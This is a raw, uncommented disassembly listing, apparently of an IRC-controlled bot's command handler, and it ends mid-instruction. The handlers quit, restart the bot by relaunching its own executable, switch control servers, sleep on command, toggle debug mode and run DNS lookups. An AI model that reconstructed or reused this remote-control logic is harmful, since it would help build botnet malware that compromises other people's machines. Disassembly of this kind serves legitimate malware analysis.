; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_40A9CF+B19�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C40
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B536
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413FE7
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_40A9CF+B4C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C34
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C28
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5A7
loc_40B575: ; CODE XREF: sub_40A9CF+B7A�j
; sub_40A9CF+B8F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413AB0
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5A7: ; CODE XREF: sub_40A9CF+BA4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5CE
lea eax, [ebp+var_1A4]
push eax
call sub_41417D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40A9CF+BEB�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B631
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz short loc_40B61B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_41673F
pop ecx
test eax, eax
jnz short loc_40B601
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B601: ; CODE XREF: sub_40A9CF+C2B�j
push 104h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_41EC40
call sub_407A56
add esp, 0Ch
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B61B: ; CODE XREF: sub_40A9CF+C1B�j
push offset dword_41EB2C
push offset dword_41EC40
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B62C: ; CODE XREF: sub_40A9CF+C4A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_40A9CF+C12�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B678
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_414600
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A9CF+C75�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B791
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B69F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40A9CF+CC9�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
shl eax, 1
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A68], eax
cmp [ebp+var_5A68], 0
jnz short loc_40B6C8
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40A9CF+CF2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_5A68]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40EB4E
add esp, 0Ch
push [ebp+var_5A68]
push offset dword_419BC4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A68]
call sub_416B4C ; free
pop ecx
push 1000h
lea eax, [ebp+var_1A60]
push eax
call sub_4104A3
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp+var_A60], eax
and [ebp+var_1A64], 0
jmp short loc_40B743
; ---------------------------------------------------------------------------
loc_40B736: ; CODE XREF: sub_40A9CF+D9B�j
mov eax, [ebp+var_1A64]
inc eax
mov [ebp+var_1A64], eax
loc_40B743: ; CODE XREF: sub_40A9CF+D65�j
cmp [ebp+var_1A64], 186A0h
jge short loc_40B76C
push 1000h
lea eax, [ebp+var_5A64]
push eax
lea eax, [ebp+var_1A60]
push eax
call sub_40EB4E
add esp, 0Ch
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40A9CF+D7E�j
call sub_416B64 ; clock
sub eax, [ebp+var_A60]
push eax
push offset aItTookMeUms_ ; "It took me %ums."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B791: ; CODE XREF: sub_40A9CF+CBC�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B823
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B7B4
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A9CF+DDE�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A6C], eax
cmp [ebp+var_5A6C], 0
jnz short loc_40B7DB
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40A9CF+E05�j
push [ebp+var_5A6C]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40E9C9
pop ecx
pop ecx
mov ecx, [ebp+var_5A6C]
and byte ptr [ecx+eax], 0
push [ebp+var_5A6C]
push offset dword_419B88
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A6C]
call sub_416B4C ; free
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B823: ; CODE XREF: sub_40A9CF+DD5�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B78
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B873
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40B85C
push offset dword_41EF48
push offset dword_419B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40A9CF+E70�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41EF48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B86E: ; CODE XREF: sub_40A9CF+E8B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_40A9CF+E67�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B58
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B899
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4097A7
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_40A9CF+EB7�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B4C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8C7
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403FE5
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_40A9CF+EDD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B3C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8ED
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4098F3
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8ED: ; CODE XREF: sub_40A9CF+F0B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B30
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B91B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406722
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B91B: ; CODE XREF: sub_40A9CF+F31�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B20
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B949
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_412F07
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_40A9CF+F5F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B14
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B98A
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A1A7
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B98A: ; CODE XREF: sub_40A9CF+F8D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9BF
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A50E
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9BF: ; CODE XREF: sub_40A9CF+FCE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9F5
push offset dword_41EB2C
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_40D6CB
pop ecx
pop ecx
push 36EE80h
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9F5: ; CODE XREF: sub_40A9CF+1003�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ADC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BA79
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA18
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40A9CF+1042�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41DAB4
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BA41
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63EC], eax
jmp short loc_40BA4B
; ---------------------------------------------------------------------------
loc_40BA41: ; CODE XREF: sub_40A9CF+1062�j
mov [ebp+var_63EC], offset byte_41DE30
loc_40BA4B: ; CODE XREF: sub_40A9CF+1070�j
push [ebp+var_63EC]
push offset dword_41ED48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41ED48
push offset dword_41DAB4
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA79: ; CODE XREF: sub_40A9CF+1039�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BADB
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA9C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40A9CF+10C6�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BAB3
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63F0], eax
jmp short loc_40BABD
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_40A9CF+10D4�j
mov [ebp+var_63F0], offset byte_41DE30
loc_40BABD: ; CODE XREF: sub_40A9CF+10E2�j
push [ebp+var_63F0]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BADB: ; CODE XREF: sub_40A9CF+10BD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB15
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BAFE
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BAFE: ; CODE XREF: sub_40A9CF+1128�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AB0
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB15: ; CODE XREF: sub_40A9CF+111F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB6C
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BB38
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40A9CF+1162�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_5A70], eax
cmp [ebp+var_5A70], 927C0h
jle short loc_40BB5B
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB5B: ; CODE XREF: sub_40A9CF+1185�j
push [ebp+var_5A70]
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_40A9CF+1159�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A9C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBB0
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BB93
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BB98
loc_40BB93: ; CODE XREF: sub_40A9CF+11B9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40A9CF+11C2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D4AB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBB0: ; CODE XREF: sub_40A9CF+11B0�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBF4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BBD7
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BBDC
loc_40BBD7: ; CODE XREF: sub_40A9CF+11FD�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: sub_40A9CF+1206�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBF4: ; CODE XREF: sub_40A9CF+11F4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BC28
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40BC17
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40A9CF+1241�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40A9CF+1238�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCB2
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BC84
cmp dword_41DE38, 0
jz short loc_40BC5B
mov [ebp+var_63F4], offset aOn ; "on"
jmp short loc_40BC65
; ---------------------------------------------------------------------------
loc_40BC5B: ; CODE XREF: sub_40A9CF+127E�j
mov [ebp+var_63F4], offset aOff ; "off"
loc_40BC65: ; CODE XREF: sub_40A9CF+128A�j
push [ebp+var_63F4]
push offset aDebugModeIsS_ ; "Debug mode is %s."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC84: ; CODE XREF: sub_40A9CF+1275�j
push offset aOn ; "on"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40BCA6
mov dword_41DE38, 1
jmp short loc_40BCAD
; ---------------------------------------------------------------------------
loc_40BCA6: ; CODE XREF: sub_40A9CF+12C9�j
and dword_41DE38, 0
loc_40BCAD: ; CODE XREF: sub_40A9CF+12D5�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCB2: ; CODE XREF: sub_40A9CF+126C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCD9
lea eax, [ebp+var_1A4]
push eax
call sub_415DFD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCD9: ; CODE XREF: sub_40A9CF+12F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A44
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD13
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BCFC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: sub_40A9CF+1326�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_419A3C
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD13: ; CODE XREF: sub_40A9CF+131D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A30
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A24
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD62
loc_40BD52: ; CODE XREF: sub_40A9CF+1357�j
; sub_40A9CF+136C�j
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD62: ; CODE XREF: sub_40A9CF+1381�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A10
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BDC9
push 104h
lea eax, [ebp+var_5B74]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
push 0
push 0
push 0
lea eax, [ebp+var_5B74]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
cmp eax, 20h
ja short loc_40BDB6
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDB6: ; CODE XREF: sub_40A9CF+13E0�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
push 0
call ds:dword_41705C ; ExitProcess
loc_40BDC9: ; CODE XREF: sub_40A9CF+13A6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A04
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE19
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BDEC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDEC: ; CODE XREF: sub_40A9CF+1416�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
push offset dword_4199D4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_40A9CF+140D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE38
call sub_407148
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE38: ; CODE XREF: sub_40A9CF+145D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199BC
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BE62
mov eax, [ebp+var_1A8]
sub eax, dword_4199B0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE7B
loc_40BE62: ; CODE XREF: sub_40A9CF+147C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_401D6E
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE7B: ; CODE XREF: sub_40A9CF+1491�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199A8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEA9
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40CEB0
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEA9: ; CODE XREF: sub_40A9CF+14BF�j
mov eax, [ebp+var_1A8]
sub eax, dword_41999C
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BED3
mov eax, [ebp+var_1A8]
sub eax, dword_41998C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEFD
loc_40BED3: ; CODE XREF: sub_40A9CF+14ED�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_40D6CB
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D366
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEFD: ; CODE XREF: sub_40A9CF+1502�j
mov eax, [ebp+var_1A8]
sub eax, dword_41996C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C0D9
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BF29
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE30
loc_40BF29: ; CODE XREF: sub_40A9CF+154E�j
lea eax, [ebp+var_5B78]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_40C0BA
mov eax, [ebp+var_5B78]
mov [ebp+var_5B7C], eax
loc_40BF54: ; CODE XREF: sub_40A9CF+16D8�j
cmp [ebp+var_5B7C], 0
jz loc_40C0AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+10h]
mov eax, [ebp+var_5B7C]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz loc_40C098
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 2
jnz short loc_40BFEA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40BFBA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63F8], eax
jmp short loc_40BFC4
; ---------------------------------------------------------------------------
loc_40BFBA: ; CODE XREF: sub_40A9CF+15DB�j
mov [ebp+var_63F8], offset dword_419968
loc_40BFC4: ; CODE XREF: sub_40A9CF+15E9�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63F8]
push offset dword_419944
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C08D
; ---------------------------------------------------------------------------
loc_40BFEA: ; CODE XREF: sub_40A9CF+15CE�j
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 17h
jnz short loc_40C03E
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C011
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63FC], eax
jmp short loc_40C01B
; ---------------------------------------------------------------------------
loc_40C011: ; CODE XREF: sub_40A9CF+1632�j
mov [ebp+var_63FC], offset dword_419968
loc_40C01B: ; CODE XREF: sub_40A9CF+1640�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63FC]
push offset dword_419920
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_40C08D
; ---------------------------------------------------------------------------
loc_40C03E: ; CODE XREF: sub_40A9CF+1625�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C059
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6400], eax
jmp short loc_40C063
; ---------------------------------------------------------------------------
loc_40C059: ; CODE XREF: sub_40A9CF+167A�j
mov [ebp+var_6400], offset dword_419968
loc_40C063: ; CODE XREF: sub_40A9CF+1688�j
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+4]
push [ebp+var_6400]
push offset dword_4198EC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
loc_40C08D: ; CODE XREF: sub_40A9CF+1616�j
; sub_40A9CF+166D�j
push 3E8h
call ds:dword_41709C ; Sleep
loc_40C098: ; CODE XREF: sub_40A9CF+15BE�j
mov eax, [ebp+var_5B7C]
mov eax, [eax+1Ch]
mov [ebp+var_5B7C], eax
jmp loc_40BF54
; ---------------------------------------------------------------------------
loc_40C0AC: ; CODE XREF: sub_40A9CF+158C�j
push [ebp+var_5B78]
call dword_41DE8C ; freeaddrinfo
jmp short loc_40C0D4
; ---------------------------------------------------------------------------
loc_40C0BA: ; CODE XREF: sub_40A9CF+1573�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C0D4: ; CODE XREF: sub_40A9CF+16E9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40A9CF+1541�j
mov eax, [ebp+var_1A8]
sub eax, dword_4198C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C1D4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40C105
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE30
loc_40C105: ; CODE XREF: sub_40A9CF+172A�j
lea eax, [ebp+var_5F84]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_40C1B5
push 4
push 0
push 0
push 401h
lea eax, [ebp+var_6388]
push eax
mov eax, [ebp+var_5F84]
push dword ptr [eax+10h]
mov eax, [ebp+var_5F84]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz short loc_40C1A9
push [ebp+var_5F84]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C179
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6404], eax
jmp short loc_40C183
; ---------------------------------------------------------------------------
loc_40C179: ; CODE XREF: sub_40A9CF+179A�j
mov [ebp+var_6404], offset dword_419968
loc_40C183: ; CODE XREF: sub_40A9CF+17A8�j
lea eax, [ebp+var_6388]
push eax
push [ebp+var_6404]
push offset dword_4198A8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1A9: ; CODE XREF: sub_40A9CF+1781�j
push [ebp+var_5F84]
call dword_41DE8C ; freeaddrinfo
loc_40C1B5: ; CODE XREF: sub_40A9CF+174F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1D4: ; CODE XREF: sub_40A9CF+171D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419898
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C37A
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C207
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
cmp eax, 0Ah
ja short loc_40C20C
loc_40C207: ; CODE XREF: sub_40A9CF+1825�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40A9CF+1836�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_638C], eax
push 4
push offset a2002 ; "2002"
mov eax, [ebp+arg_14]
